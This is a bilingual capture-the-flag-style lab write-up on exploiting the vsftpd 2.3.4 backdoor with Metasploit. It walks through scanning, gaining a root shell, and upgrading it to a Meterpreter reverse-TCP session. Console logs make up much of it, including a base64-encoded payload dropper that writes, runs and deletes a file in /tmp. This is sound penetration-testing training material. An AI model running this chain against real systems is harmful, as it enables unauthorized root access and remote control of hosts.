Exploiting A Vulnerable FTP Server
Exploiting FTP
FTP (File Transfer Protocol) is a protocol that uses TCP port 21 and is used to facilitate file sharing between a server and client/clients.
It is also frequently used as a means of transferring files to and from the directory of a web server.
Vsftpd is an FTP server for Unix-like systems including Linux systems and is the default FTP server for Ubuntu, CentOS and Fedora.
Vsftpd V2.3.4 is vulnerable to a command execution vulnerability that is facilitated by a malicious backdoor that was added to the vsftpd download archive through a supply chain attack.
利用易受攻击的 FTP 服务器
利用FTP
FTP(文件传输协议)是一种使用 TCP 端口 21 的协议,用于促进服务器和客户端之间的文件共享。
它还经常用作在 Web 服务器的目录之间传输文件的方式。
Vsftpd 是用于包括 Linux 系统在内的类 Unix 系统的 FTP 服务器,并且是 Ubuntu、CentOS 和 Fedora 的默认 FTP 服务器。
Vsftpd V2.3.4 容易受到命令执行漏洞的影响,该漏洞由通过供应链攻击添加到 vsftpd 下载存档的恶意后门促成。
Demo: Exploit A Vulnerable FTP Server(演示:利用易受攻击的 FTP 服务器)
1
2
ifconfig
eth1: inet 192.209.183.2
Make sure that the PostgreSQL database Service is started, so that we can interact with the Metasploit Framework database.
1
service postgresql start
1
msfconsole
Create a new workspace.
1
workspace -a vsftpd2.3.4
Set up the global variable for the RHOSTS option, so that we don’t have to keep typing in the target IP address. That should set up the RHOSTS value in all modules that we load.
1
setg RHOSTS 192.209.183.3
Confirm that we’re working within the vsftpd 2.3.4 workspace.
1
workspace
Perform an Nmap scan with the db_nmap command which can be used to perform an Nmap scan from within the Metasploit Framework console, and consequently save the Nmap scan results into the Metasploit Framework database within our current workspace.
-sS: Perform a SYN scan.
-sV: Perform service detection.
-O: Perform operating system detection.
1
db_nmap -sS -sV -O 192.209.183.3
Check back on your scan results by typing in the services command.
1
services
vulns: List all the vulnerabilities.
1
vulns
analyze: Identify vulnerabilities.
1
analyze
VSFTPD v2.3.4 Backdoor Command Execution
This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.
VSFTPD v2.3.4 后门命令执行
该模块利用添加到 VSFTPD 下载存档的恶意后门。根据最新的可用信息,此后门程序于 2011 年 6 月 30 日至 2011 年 7 月 1 日期间被引入 vsftpd-2.3.4.tar.gz 存档。该后门已于 2011 年 7 月 3 日删除。
1
2
3
4
5
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show options
info
run
We get a command shell session opened. And our current privileges are root, so that means we have the highest privileges available on a Linux system, which consequently means we don’t need to perform any privilege escalation in this case.
That is a command session.
Open up a bash terminal on the target system.
1
/bin/bash -i
Now we have access to the target system through a command shell. We can also upgrade this command shell to a Meterpreter session by putting this session into the background. That can be done by utilizing the keyboard combination Ctrl+Z. That will prompt you to put it in the background.
List out our sessions.
1
sessions
Search for the shell_to_meterpreter module, which will upgrade our current command shell session to a Meterpreter session.
1
search shell_to_meterpreter
This is a post-exploitation module. It requires us to already have access to the target system, and we should already have an active session on the target system, which we do.
1
2
use post/multi/manage/shell_to_meterpreter
show options
LHOST: the IP address of the Kali Linux system, which is the system that we’re currently working on. That is going to be used to receive the connection from the payload. We can specify the interface name instead of looking up the IP address ourselves.
LPORT: the port that for the payload to connect to.
Set the session ID to session 1.
1
2
3
set LHOST eth1
set SESSION 1
run
We have a Meterpreter session opened up.
1
sessions
getuid: get the user id, which tells us we are currently the root user, because the uid(user id) is 0 is in reference to the root user, so we have root privileges.
1
2
sessions 2
meterpreter > sysinfo
That is how to gain access or how to exploit a vulnerable FTP server. And in this case, we’ve also explored a post-exploitation module that can allow us to upgrade our command shell to a Meterpreter session.
Vulnerable FTP Server
Overview
The target server as described below is running a vulnerable FTP server. Your task is to fingerprint the application using command line tools available on the Kali terminal and then exploit the application using the appropriate Metasploit module. Get a Meterpreter shell on the target!
Instructions:
- This lab is dedicated to you! No other users are on this network :)
- Once you start the lab, you will have access to a root terminal of a Kali instance
- Your Kali has an interface with IP address 192.X.Y.Z. Run “ip addr” to know the values of X and Y.
- The target server should be located at the IP address 192.X.Y.3.
- Do not attack the gateway located at IP address 192.X.Y.1
- postgresql is not running by default so Metasploit may give you an error about this when starting
Solutions
The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-179.pdf
我自己的思路
1
2
3
4
root@attackdefense:~# ifconfig
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.15.82.2 netmask 255.255.255.0 broadcast 192.15.82.255
ether 02:42:c0:0f:52:02 txqueuelen 0 (Ethernet)
Target IP Address: 192.15.82.3
1
2
3
4
5
6
7
8
9
10
11
root@attackdefense:~# service postgresql start
[ ok ] Starting PostgreSQL 11 database server: main.
root@attackdefense:~# msfconsole -q
msf5 > workspace -a vsftpd2.3.4
[*] Added workspace: vsftpd2.3.4
[*] Workspace: vsftpd2.3.4
msf5 > workspace
default
* vsftpd2.3.4
msf5 > setg RHOSTS 192.15.82.3
RHOSTS => 192.15.82.3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
msf5 > db_nmap -sS -sV -O 192.15.82.3
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-02-01 03:20 UTC
[*] Nmap: Nmap scan report for target-1 (192.15.82.3)
[*] Nmap: Host is up (0.000025s latency).
[*] Nmap: Not shown: 999 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 2.3.4
[*] Nmap: MAC Address: 02:42:C0:0F:52:03 (Unknown)
[*] Nmap: No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
[*] Nmap: TCP/IP fingerprint:
[*] Nmap: OS:SCAN(V=7.70%E=4%D=2/1%OT=21%CT=1%CU=44053%PV=N%DS=1%DC=D%G=Y%M=0242C0%TM
[*] Nmap: OS:=63D9DA78%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%
[*] Nmap: OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
[*] Nmap: OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
[*] Nmap: OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
[*] Nmap: OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
[*] Nmap: OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
[*] Nmap: OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
[*] Nmap: OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
[*] Nmap: OS:%T=40%CD=S)
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: OS: Unix
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 12.14 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
msf5 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.15.82.3 21 tcp ftp open vsftpd 2.3.4
msf5 > vulns
Vulnerabilities
===============
Timestamp Host Name References
--------- ---- ---- ----------
msf5 > analyze
[*] Analyzing 192.15.82.3...
[-] Error while running command analyze: undefined method `host' for nil:NilClass
Call stack:
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/db/analyze.rb:49:in `block in cmd_analyze'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/db/analyze.rb:39:in `each'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/db/analyze.rb:39:in `cmd_analyze'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:522:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:473:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:467:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:467:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:151:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:49:in `<main>'
1
2
3
4
5
6
7
8
msf5 > search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 192.15.82.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.15.82.3:21 - USER: 331 Please specify the password.
[+] 192.15.82.3:21 - Backdoor service has been spawned, handling...
[+] 192.15.82.3:21 - UID: uid=0(root) gid=0(root) groups=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.15.82.2:45985 -> 192.15.82.3:6200) at 2023-02-01 03:32:54 +0000
/bin/bash -i
bash: cannot set terminal process group (10): Inappropriate ioctl for device
bash: no job control in this shell
root@victim-1:~/vsftpd-2.3.4# whoami
whoami
root
1
2
3
4
5
6
7
8
9
10
root@victim-1:~/vsftpd-2.3.4# ^Z
Background session 1? [y/N] y
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.15.82.2:45985 -> 192.15.82.3:6200 (192.15.82.3)
Shell to Meterpreter Upgrade
This module attempts to upgrade a command shell to meterpreter. The shell platform is automatically detected and the best version of meterpreter for the target is selected. Currently meterpreter/reverse_tcp is used on Windows and Linux, with ‘python/meterpreter/reverse_tcp’ used on all others.
Shell 到 Meterpreter 升级
该模块尝试将命令 shell 升级到 meterpreter。会自动检测 shell 平台,并选择最适合目标的 meterpreter 版本。目前 meterpreter/reverse_tcp 在 Windows 和 Linux 上使用,’python/meterpreter/reverse_tcp’ 在所有其他系统上使用。
1
2
3
4
5
6
7
8
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > search shell_to_meterpreter
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 post/multi/manage/shell_to_meterpreter normal No Shell to Meterpreter Upgrade
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > use post/multi/manage/shell_to_meterpreter
msf5 post(multi/manage/shell_to_meterpreter) > show options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connection
LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
LPORT 4433 yes Port for payload to connect to.
SESSION yes The session to run this module on.
msf5 post(multi/manage/shell_to_meterpreter) > set LHOST eth1
LHOST => 192.15.82.2
msf5 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf5 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.15.82.2:4433
[*] Sending stage (985320 bytes) to 192.15.82.3
[*] Meterpreter session 2 opened (192.15.82.2:4433 -> 192.15.82.3:55484) at 2023-02-01 03:52:25 +0000
[-] Error: Unable to execute the following command: "echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1towA9SAmgCABFRieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZtgywA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/zAVGf.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/bbfpr' < '/tmp/zAVGf.b64' ; chmod +x '/tmp/bbfpr' ; '/tmp/bbfpr' & sleep 2 ; rm -f '/tmp/bbfpr' ; rm -f '/tmp/zAVGf.b64'"
[-] Output: "[1] 22"
[*] Stopping exploit/multi/handler
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
msf5 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.15.82.2:45985 -> 192.15.82.3:6200 (192.15.82.3)
2 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ 192.15.82.3 192.15.82.2:4433 -> 192.15.82.3:55484 (192.15.82.3)
1
2
3
4
5
6
7
8
9
10
11
msf5 post(multi/manage/shell_to_meterpreter) > sessions 2
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer : 192.15.82.3
OS : Debian 9.5 (Linux 5.4.0-125-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
